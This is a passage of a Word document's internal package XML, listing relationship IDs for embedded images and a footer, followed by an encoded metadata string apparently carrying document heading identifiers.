Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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6.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gUqxAJ9bx6CrVSuDQtDAvu+9kg==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLm1uZnN2djl5YTA2aDIOaC5iMjgzZDFycDFhMzUyDmguOG51NWozeXRyNnZyMg5oLjE3NWY1Y3M5NHowbzgAciExTGY3SE1lRzExQWhXTEtFbEFQeTNXYkQ3UFp3ZWhrSXE=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